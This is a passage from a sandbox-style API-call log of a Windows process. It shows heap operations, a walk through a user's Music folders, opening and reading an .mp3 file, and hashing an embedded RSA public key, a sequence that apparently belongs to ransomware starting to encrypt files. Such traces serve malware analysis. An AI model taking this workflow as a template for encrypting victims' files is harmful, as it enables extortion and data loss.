(HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.893] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\0cC9EkHwaIG\\") returned="0cC9EkHwaIG\\" [0196.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47a88 [0196.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.893] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\") returned="PsRcKmPEdiF_ OxVk\\" [0196.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0196.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0196.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47a88 | out: hHeap=0x6a0000) returned 1 [0196.894] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\") returned="iPggquG4\\" [0196.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0196.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0196.894] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\") returned="fUhvLY4JeAGwk\\" [0196.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cff8 [0196.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.895] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0196.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cff8 | out: hHeap=0x6a0000) returned 1 [0196.895] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0196.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.896] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0196.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.896] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0196.896] PathFindFileNameW (pszPath="") returned="" [0196.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.896] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\0cC9EkHwaIG\\*" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\0cc9ekhwaig\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd633daf0, ftCreationTime.dwHighDateTime=0x1d8a3cf, ftLastAccessTime.dwLowDateTime=0x1896ecc0, ftLastAccessTime.dwHighDateTime=0x1d8a623, ftLastWriteTime.dwLowDateTime=0x1896ecc0, ftLastWriteTime.dwHighDateTime=0x1d8a623, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0196.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.898] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd633daf0, ftCreationTime.dwHighDateTime=0x1d8a3cf, ftLastAccessTime.dwLowDateTime=0x1896ecc0, ftLastAccessTime.dwHighDateTime=0x1d8a623, ftLastWriteTime.dwLowDateTime=0x1896ecc0, ftLastWriteTime.dwHighDateTime=0x1d8a623, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.898] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd6c80, ftCreationTime.dwHighDateTime=0x1d89a30, ftLastAccessTime.dwLowDateTime=0x7cbcbd00, ftLastAccessTime.dwHighDateTime=0x1d89c6a, ftLastWriteTime.dwLowDateTime=0x7cbcbd00, ftLastWriteTime.dwHighDateTime=0x1d89c6a, nFileSizeHigh=0x0, nFileSizeLow=0xa936, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5VO8Yp9P.mp3", cAlternateFileName="")) returned 1 [0196.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x2be2220 [0196.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.898] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\0cC9EkHwaIG\\5VO8Yp9P.mp3") returned=".mp3" [0196.898] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\0cC9EkHwaIG\\5VO8Yp9P.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\0cc9ekhwaig\\5vo8yp9p.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0196.901] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=43318) returned 1 [0196.901] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0196.903] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xa910, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.903] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0196.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.906] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.906] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xa936, lpOverlapped=0x0) returned 1 [0196.907] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0196.907] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.907] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.907] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0196.908] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0196.908] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.908] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0196.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0196.909] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0196.909] GetLastError () returned 0x0 [0196.909] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0196.909] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0196.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0196.909] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0196.909] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0196.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.909] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0196.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa940) returned 0x2d4d778 [0196.910] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0196.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0196.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0196.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cff8 [0196.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2d0 [0196.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d040 [0196.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2e8 [0196.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a318 [0196.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a378 [0196.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a330 [0196.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0196.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0196.911] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0196.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0196.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0196.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0196.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0196.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0196.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a378 [0196.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0196.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a330 [0196.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0196.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a318 [0196.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0196.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c31700 [0196.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0196.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0196.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0196.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0196.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0196.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0196.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0196.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0196.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0196.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0196.914] GetCurrentThreadId () returned 0x264 [0196.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0196.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d47680 [0196.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0196.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0196.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0196.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0196.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.914] GetCurrentThreadId () returned 0x264 [0196.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c03ca0 [0196.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0196.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0196.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0196.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a378 [0196.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0196.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0196.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0196.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a318 [0196.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0196.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0196.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0196.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0196.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a330 [0196.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0196.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0196.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0196.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a300 [0196.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0196.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a390 [0196.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0196.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a360 [0196.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.917] RtlAllocateHeap 